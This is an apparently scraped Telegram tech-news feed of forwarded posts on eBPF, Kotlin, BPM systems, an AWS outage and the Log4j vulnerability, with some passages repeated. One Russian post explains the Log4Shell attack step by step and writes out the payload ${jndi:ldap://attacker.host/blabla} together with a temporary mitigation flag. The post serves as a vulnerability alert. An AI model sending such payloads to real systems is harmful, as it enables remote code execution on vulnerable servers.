Forwarded from Sysadmin Tools 🇺🇦
How eBPF will solve Service Mesh - Goodbye Sidecars
https://isovalent.com/blog/post/2021-12-08-ebpf-servicemesh
#ebpf #servicemesh #debug #tracing #k8s #kubernetes
https://isovalent.com/blog/post/2021-12-08-ebpf-servicemesh
#ebpf #servicemesh #debug #tracing #k8s #kubernetes
Forwarded from Artjom Kalita
Forwarded from Полезняшки от "Разбора Полетов"
Встречаемся на ночном образовательном шоу IT Nights 3.0
10 декабря в прямом эфире @JBaruch обещает исповедоваться, а @asm0dey предстоит отстоять честь славного дома Котлин. Ещё будут спикеры из Facebook, Яндекса, VK, X5 Group с другими заданиями. Самое прекрасное, что зрители смогут влиять на происходящее в кадре!
Запоминай:
• 10 декабря в 19:00
• it-nights.ru
• промокод: razborpoletov
Чего бы ты ни ждал — будет иначе 👀
10 декабря в прямом эфире @JBaruch обещает исповедоваться, а @asm0dey предстоит отстоять честь славного дома Котлин. Ещё будут спикеры из Facebook, Яндекса, VK, X5 Group с другими заданиями. Самое прекрасное, что зрители смогут влиять на происходящее в кадре!
Запоминай:
• 10 декабря в 19:00
• it-nights.ru
• промокод: razborpoletov
Чего бы ты ни ждал — будет иначе 👀
Forwarded from Кавычка (Bo0oM)
У половины интернета нашли выполнение произвольного кода через Log4j.
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс:
Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
Выглядит это так:
1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.
Гроб. Гроб. Кладбище.
Временный фикс:
JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
Amazon explains outage that took out a large chunk of the internet
https://www.engadget.com/amazon-aws-outage-explanation-214151710.html?src=rss
https://www.engadget.com/amazon-aws-outage-explanation-214151710.html?src=rss
Engadget
Amazon explains outage that took out a large chunk of the internet | Engadget
Amazon has explained the AWS outage that knocked a large part of the internet offline, and promised an easier time tracking those failures..
Why Can't Programmers.. Program? (2007)
https://blog.codinghorror.com/why-cant-programmers-program/
https://blog.codinghorror.com/why-cant-programmers-program/
Coding Horror
Why Can’t Programmers... Program?
I was incredulous when I read this observation from Reginald Braithwaite:
Like me, the author is having trouble with the fact that 199 out of 200 applicants for every programming job can’t write code at all. I repeat: they can’t write any code whatsoever.…
Like me, the author is having trouble with the fact that 199 out of 200 applicants for every programming job can’t write code at all. I repeat: they can’t write any code whatsoever.…
[Перевод] Прощай, Grails. Привет, Micronaut. Продолжение
https://habr.com/ru/company/otus/blog/593965/
https://habr.com/ru/company/otus/blog/593965/
Хабр
Прощай, Grails. Привет, Micronaut. Продолжение
Это вторая статья из цикла о миграции из Grails в Micronaut. Обратите внимание: ваше приложение должно быть создано в Grails 4.x или более поздней версии . Всего в цикле публикаций о миграции из...
👍1
Forwarded from IT Юмор
Недавно в Apache Log4j 2, популярном фреймворке для организации ведения логов в Java-приложениях, была выявлена критическая уязвимость.
Она позволяет выполнить произвольный код при записи в лог специально оформленного значения в формате "{jndi:URL}". Атака может быть проведена на Java-приложения, записывающие в лог значения, полученные из внешних источников, например, при выводе проблемных значений в сообщениях об ошибках.
Поэтому держите парочку мемов на эту тему
Она позволяет выполнить произвольный код при записи в лог специально оформленного значения в формате "{jndi:URL}". Атака может быть проведена на Java-приложения, записывающие в лог значения, полученные из внешних источников, например, при выводе проблемных значений в сообщениях об ошибках.
Поэтому держите парочку мемов на эту тему
Сегодня будет весьма интересный вебинарчик про KotlinDL https://info.jetbrains.com/kotlin-webinar-december14-2021.html
YouTube
Object Detection and Image Recognition with Kotlin
In this webinar, we will explore a deep learning library written in Kotlin, learn how to detect objects of different types in images, build predictive models on numeric data, and create a Kotlin Web Application using Ktor and KotlinDL, which will recognize…
Zeebe и Camunda: сравниваем известные BPM-системы под высокими нагрузками
https://habr.com/ru/company/raiffeisenbank/blog/594117/
https://habr.com/ru/company/raiffeisenbank/blog/594117/
Хабр
Zeebe и Camunda: сравниваем известные BPM-системы под высокими нагрузками
Всем привет! Меня зовут Николай Первухин, я Senior Java Developer в Райффайзенбанке. В последнее время я активно занимаюсь BPM-системами Camunda и Zeebe (основа Camunda-cloud). Если вы, как и я, с...
Syntax Highlight
https://github.com/sbarex/SourceCodeSyntaxHighlight
https://github.com/sbarex/SourceCodeSyntaxHighlight
GitHub
GitHub - sbarex/SourceCodeSyntaxHighlight: Quick Look extension for highlight source code files on macOS 10.15 and later.
Quick Look extension for highlight source code files on macOS 10.15 and later. - sbarex/SourceCodeSyntaxHighlight
Forwarded from Ihar Tigar
www.opennet.ru
Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту
В реализации подстановок JNDI в библиотеке Log4j 2 выявлена ещё одна уязвимость (CVE-2021-45046), проявляющаяся несмотря на добавленные в выпуск 2.15 исправления и независимо от использования настройки "log4j2.noFormatMsgLookup" для защиты. Проблема представляет…
Forwarded from Vik Gamov
Кому тестконтейнеры https://youtu.be/vCSrOJevgNk
YouTube
Testcontainers Live #2: Modern Java
In this live-stream you we're joined by James Ward (@_jamesward), who's a Java Champion, speaker, author, and a developer advocate. James always keeps an eye on the Java ecosystem and has experience to evaluate current trends and new technologies very effectively!…